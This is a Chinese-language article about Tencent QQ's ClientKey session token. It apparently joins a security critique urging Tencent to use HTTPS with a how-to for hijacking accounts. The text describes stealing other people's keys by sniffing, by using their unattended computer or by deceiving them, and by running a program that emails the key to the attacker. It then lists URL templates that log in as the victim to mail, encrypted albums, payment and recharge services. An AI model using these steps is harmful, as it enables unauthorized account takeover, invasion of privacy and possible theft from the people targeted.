ClientKey是什么?ClientKey基于目前微软公司流行的ACTIVEX技术开发,是专门用来增强网站会员帐号安全性的ACTIVEX控件。
当您的网站使用ClientKey控件后,网站会员的帐号将会与他们所使用的机器相互绑定,绑定后的帐号将不能在非绑定的机器上登陆网站,从而加强了会员帐号的安全性,同时也保护了网站的利益,避免了同一帐号被多人使用。
腾讯产品的ClientKey,就是当你在客户端上点击如腾讯朋友,扣扣空间,腾讯微博之类的东西,会跳转到一个网页,在这跳转过程中,链接中的值包含用户账号以及Clientkey,例如点击腾讯朋友图标,打开的链接会是:/xiaoyou_clienttop?clientuin=523627970&clientkey=5912599 7A79E9E70969E799F6109787089636X2D7357124B9EF754**********F,这个ClienyKey就相当于密码,它不是密码,但它的密码的作用一样。
如何拿到ClientKey?很简单,登录QQ后断掉网,点击腾讯朋友的图标(其它的也行),弹出的网页地址栏的东西就是。
上面说的是拿到自己的ClientKey,要拿到别人的Clientkey就得你自己想办法了。
由于腾讯的大部分产品都没有使用SSL加密,你在中间用各种高端的嗅探技术是可以拿到的;趁别人不在,在她的电脑上点两下,拿到那个key也可以;花言巧语骗美女把那个地址复制粘贴给你也行。
总之只要你想,绝对拿的到。
拿到ClientKey能干什么?ClientKey和密码的作用一样,你说能干什么?能看加密QQ空间,加密的相册,能看QQMail (设置二次登录密码就不行了),腾讯朋友,腾讯微博,反正绝大多数腾讯的网页都可以以她的身份登录进去。
当然Tenpay是不行的,财付通应该和它没有共用一套鉴权。
再谈腾讯Clientkey腾讯服务器针对一个账号,一次分发一个Clientkey,但可以同时接收不同的Clientkey,处理方式都是当作合法用户登录。
Clientkey的有效时间应该在30分钟以上(我自己就测试了那么长时间),反正我觉得这么长时间是很危险的。
如果此Clientkey能够用到腾讯的手机财付通上面,那么你Tenpay里的余额与一点通绑定的银行卡里的钱消失,绝对不是没有可能。
你如果跟我提有个支付短信验证码的问题,那就多说几句,只要能够登录你的账户,短信验证码都是云。
具体操作如下:为手机里面放一个同步软件(s60的蜡笔同步,不要说这个很难,网秦飞流当年也上过好多手机),即时同步收到的短信,你的短信铃声还没响完,短信早已经同步网页上,人家输完验证码,估计你才打开短信,等你看完,钱已经没了。
关于财付通的安全问题,请看我昨天的文章《财付通安全性问题》。
当然这一块也是自己瞎想的,如果要真的操作起来,也得费点功夫。
但这些问题如果你真的忽视了,后果会很严重的。
毕竟很多人是想要搞死你腾讯。
要想解决这个问题,对于腾讯来讲真费不了多少。
花钱买平安,所有登录服务全部启用https;要不你就把那个ClientKey有效时间再放小一点或者干脆使用一次性ClientKey,我个人觉得这一点可能不好操作,时间太短或者使用一次性的ClientKey会严重影响用户体验,最直接的结果就是导致用户需要频繁登录。
不过腾讯是全中国人才储备最多的企业,发射个探月飞船都不是个小case,解决这个问题嘛,自然也不验。
PS:对于腾讯在微博和说说上的小动作,你的地盘你作主,我没什么好说的。
但作为国内最大的互联网企业,你丫肚量太小了。
盗取clientkey 破解QQ加密空间,QQ加密相册。
对于别人加密的QQ空间及相册,我们都十分有好奇心,也想尝试去破解,无奈网络上的那些办法都已过时,现在想破解出密码真是比登天还难。
那么现在有什么办法可以破解加密的QQ空间和相册呢?其实我们完全没必要去破解出密码,因为我们可以绕过加密,直接观看对方的QQ空间及相册里的内容。
我们只需要拿到对方的clientkey就可以了,在已经运行QQ的电脑上,运行自己的盗取clientkey程序,就会取clientkey发送到我们的邮箱里。
我们把整个网址复制到IE浏览器中打开,是不是已经绕过对方的密码直接进入到了空间中?OK,现在我们的权限和对方自己登录是一样的,我们可以删除、修改空间中的任意文章或图片。
此外,用这种方法我们还可以登录对方的QQ校友、MYQQ等服务,只要得到访问网址就可以了/showaccount?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey) (QQ邮箱)/qqshow?clientuin=(QQ号码)&clientkey=(clientkey)&opuin=(QQ号码)&ptlang=2052&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ秀)/jump?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u1=http%3A%2F%%2F(QQ号码)%3FADUIN=(QQ号码)%26ADSESSION=1254209494%26ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ空间)/client_jump?clickid=3&clientuin=(QQ号码)&touin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (拍拍卖家)/client_jump?clickid=6&clientuin=(QQ号码)&touin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (拍拍买家)/qqmail?Fun=clientread&ADUIN=(QQ号码)&ADSESSION=iii&ADTAG=jjj&clientuin=(QQ号码)&clientkey=(clientkey)&ptlang=2052&httptype=0&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_.0 (QQ邮箱)/clienturl_simp_16?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u2=(QQ号码)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ交友)/clienturl_246?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u=(QQ号码)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ视频)/jump?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u1=http%3A%2F%%2Fclienturl_97%3Fptlang=2052%26ownerid=(QQ号码)%26ADUIN=(QQ号码)%26ADSESSION=1254209494%26ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ 相册)/qqgodk.shtml?friqq=(QQ号码)&jp=4&clientuin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ滔滔)/clienturl_253?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (Q吧)/clienturl_tubiao?busid=15&clientuin=(QQ号码)&clientkey=(clientkey)(财付通)/client_to_paipai?clickid=156&clientuin=(QQ号码)&clientkey=(clientkey)&touin=(QQ号码)&level=0&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ充值)/goto.php?where=profile&groupcode=0&qq=(QQ号码)&p=99E9CA174D40564B5112E8E54E3477F43AB28DC487582427C9697243F79ADEFD8D2427362BA FA6D4&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ 校友)/clubclient?ptlang=2052&from=539&clientuin=(QQ号码)&clientkey=(clientkey)¶m=(QQ号码)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ会员)将你获取的QQ号和权限码替换到以上链接就可任意使用其QQ号所有功能。